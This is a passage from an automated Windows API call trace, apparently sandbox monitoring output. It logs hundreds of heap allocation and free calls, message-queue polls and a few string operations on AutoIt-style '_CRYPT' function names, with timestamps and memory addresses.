lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0127.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0127.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0127.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0127.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0127.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0127.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0127.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0127.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0127.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0127.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0127.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0127.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0127.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0127.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0127.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0127.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0127.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0127.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0127.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0127.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0127.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0127.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0127.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0127.275] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0127.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0127.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0127.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0127.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0127.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0127.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0127.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0127.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8cd8 [0127.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0127.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0127.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0127.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0127.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0127.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0127.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0127.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0127.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0127.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0127.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0127.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0127.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0127.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e97a0 [0127.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0127.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0127.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0127.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0127.276] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0127.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0127.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0127.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0127.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0127.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0127.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0127.276] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0127.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0127.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0127.276] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0127.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0127.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0127.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa00 [0127.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0127.277] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0127.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0127.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0127.277] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0127.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0127.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0127.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa60 [0127.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0127.277] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0127.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0127.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0127.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0127.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0127.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0127.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0127.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0127.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0127.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0127.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca808 [0127.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0127.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8f8 [0127.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca790 [0127.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0127.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7d8 [0127.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca910 [0127.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0127.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0127.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0127.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0127.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0127.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0127.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0127.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0127.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0127.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0127.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0127.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0127.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0127.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0127.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0127.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0127.278] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0127.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0127.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0127.278] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0127.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0127.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0127.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923e8 [0127.279] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0127.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923e8 | out: hHeap=0x1780000) returned 1 [0127.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0127.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9a0 [0127.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0127.279] PeekMessageW (in: lpMsg=0x144e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e944) returned 0 [0127.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0127.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0127.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0127.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0127.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0127.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0127.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0127.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0127.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0127.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0127.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0127.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0127.279] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0127.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0127.279] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0127.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0127.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0127.279] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0127.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0127.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0127.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0127.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0127.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0127.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0127.280] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0127.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0127.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0127.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0127.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0127.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0127.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0127.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0127.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0127.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0127.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0127.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0127.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0127.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0127.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0127.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0127.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0127.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0127.281] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0127.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0127.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0127.281] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0127.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0127.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0127.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0127.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0127.281] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0127.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0127.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392570 [0127.281] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0127.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392570 | out: hHeap=0x1780000) returned 1 [0127.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0127.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0127.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0127.281] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0127.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0127.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0127.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0127.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0127.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0127.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0127.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0127.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0127.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0127.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca688 [0127.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0127.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca490 [0127.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6e8 [0127.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0127.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0127.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0127.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0127.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0127.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0127.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0127.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0127.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0127.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0127.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0127.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0127.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0127.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0127.282] HeapFree (in: 